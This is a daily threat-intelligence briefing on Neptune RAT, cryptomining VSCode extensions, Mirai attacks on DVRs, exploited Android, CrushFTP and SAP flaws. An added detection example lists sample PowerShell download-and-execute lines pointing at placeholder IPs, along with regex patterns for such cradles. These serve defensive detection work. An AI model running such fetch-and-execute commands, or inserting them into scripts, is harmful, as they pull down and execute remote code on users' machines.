Cyware Daily Threat Intelligence, April 08, 2025

Daily Threat Briefing • April 8, 2025
What looked like useful dev tools were actually mining rigs in disguise. Several malicious extensions on the VSCode Marketplace were found silently installing the XMRig miner. Over 300,000 installs flew under the radar before discovery.
A wave of Mirai-linked scanning is hitting video surveillance systems. GreyNoise has tracked a spike in exploitation attempts targeting TVT NVMS9000 DVRs, with over 2,500 IPs launching attacks. The flaw could grant attackers admin access to DVRs.
Two USB-related vulnerabilities in the Linux kernel have been weaponized in real-world attacks. Google has patched both: one enables information disclosure, the other privilege escalation. The latter was previously used in a targeted Android exploit late last year. All known active exploitation paths have now been patched in the latest round of 62 fixes.
New Neptune RAT spreads via YouTube
The latest version of Neptune RAT has been discovered; it uses advanced anti-analysis techniques and persistence methods to maintain its presence on the victim’s system. It comes packed with malicious features, including a crypto clipper, a password stealer that exfiltrates credentials from 270+ unique apps, ransomware capabilities, and live desktop monitoring. Neptune RAT uses a technique involving the PowerShell commands irm (Invoke-RestMethod) and iex (Invoke-Expression) to download and execute a batch script and the malware payload, establishing a connection between the client and the attacker’s server. The malware has been proliferating across GitHub, Telegram, and YouTube, targeting Windows users.
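As an added defender-side example, not taken from the Cyware briefing, the irm/iex download-and-execute pattern described above can be flagged in PowerShell script block logs (event ID 4104) by requiring both a download cmdlet and an execution sink in the same block, which also avoids flagging ordinary Invoke-RestMethod API calls. The event IDs, URLs and script text below are constructed sample data.

```python
import re

# Constructed sample script block texts (as logged in PowerShell event 4104); not real telemetry.
SAMPLE_SCRIPT_BLOCKS = [
    ("evt-1", "Get-ChildItem C:\\Users | Sort-Object Length"),
    ("evt-2", "irm http://203.0.113.10/stage.bat | iex"),
    ("evt-3", "Invoke-Expression (Invoke-RestMethod -Uri 'http://198.51.100.7/p.ps1')"),
    ("evt-4", "Invoke-RestMethod -Uri https://api.example.test/status | ConvertFrom-Json"),
]

# Cmdlets and aliases that fetch remote content, and sinks that execute a string as code.
DOWNLOAD_SOURCES = (r"invoke-restmethod", r"\birm\b", r"invoke-webrequest", r"\biwr\b", r"downloadstring")
EXEC_SINKS = (r"invoke-expression", r"\biex\b")


def normalize(script: str) -> str:
    # Cmdlet names and aliases are case-insensitive in PowerShell, so fold case
    # and collapse whitespace before matching.
    return re.sub(r"\s+", " ", script).lower()


def is_download_cradle(script: str) -> bool:
    """True when one script block both fetches remote content and passes it to an execution sink."""
    s = normalize(script)
    has_source = any(re.search(p, s) for p in DOWNLOAD_SOURCES)
    has_sink = any(re.search(p, s) for p in EXEC_SINKS)
    return has_source and has_sink


def flag_events(events):
    """Return the IDs of script block events matching the download cradle pattern."""
    return [event_id for event_id, script in events if is_download_cradle(script)]


if __name__ == "__main__":
    for event_id in flag_events(SAMPLE_SCRIPT_BLOCKS):
        print(f"{event_id}: download cradle detected")
```

The piped form (evt-2) and the nested form (evt-3) are both caught, while the benign API call in evt-4 is not, because it has no execution sink.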
Malicious VSCode extensions drop malware
Nine malicious extensions were discovered on Microsoft's Visual Studio Code Marketplace, posing as legitimate development tools. These extensions, which have amassed over 300,000 installs since April 4, secretly install the XMRig cryptominer to mine Ethereum and Monero. The extensions include Discord Rich Presence for VS Code and Rojo – Roblox Studio Sync, among others. When installed, they fetch a PowerShell script from an external source, which then disables defenses, establishes persistence, escalates privileges, and loads the cryptominer.
Surge in exploitation attempts against TVT DVRs
GreyNoise Intelligence has detected a significant increase in exploitation attempts against TVT NVMS9000 DVRs, primarily used in security and surveillance systems. The activity, which peaked on April 3 with over 2,500 unique IPs, is associated with the Mirai botnet. The vulnerability could potentially allow attackers to gain administrative control over affected systems. Most malicious IP addresses are targeting systems in the U.S., the U.K., and Germany, with the majority originating from Asia-Pacific. GreyNoise recommends that organizations using the NVMS9000 DVR block known malicious IP addresses, apply available patches, restrict public internet access to DVR interfaces, and monitor network traffic for signs of unusual activity.
Google issues Android update
Google released patches for 62 vulnerabilities, two of which have been exploited in real-world attacks. These two high-severity vulnerabilities, CVE-2024-53150 and CVE-2024-53197, are both in the USB sub-component of the kernel and could lead to information disclosure and privilege escalation, respectively. Google acknowledged that these vulnerabilities may have been exploited in limited, targeted attacks. Notably, CVE-2024-53197, along with two other vulnerabilities, was used to break into an Android phone in December 2024. Google has now patched all three vulnerabilities.
CISA adds CrushFTP bug to KEV catalog
A critical security vulnerability in CrushFTP software has been added to CISA’s KEV catalog due to active exploitation in the wild. The flaw, an authentication bypass issue, could allow unauthenticated attackers to take over vulnerable instances and has been fixed in versions 10.8.4 and 11.3.1. Huntress has observed in-the-wild exploitation of the vulnerability, with attackers using the MeshCentral agent and other malware for post-exploitation activities. The threat actors have targeted various sectors, including marketing, retail, and semiconductors, and have installed remote desktop software, harvested credentials, and added a non-admin user to the local administrators group.
SAP April 2025 Patch Day
SAP released a series of critical security updates during its Security Patch Day. The updates included 18 new Security Notes and 2 updates to previously released notes. Among the most critical fixes were code injection vulnerabilities in SAP S/4HANA (CVE-2025-27429) and SAP Landscape Transformation (CVE-2025-31330), both posing significant threats to system security. An authentication bypass flaw in SAP Financial Consolidation was also addressed. Other updates included fixes for high-, medium-, and low-priority vulnerabilities across various SAP products.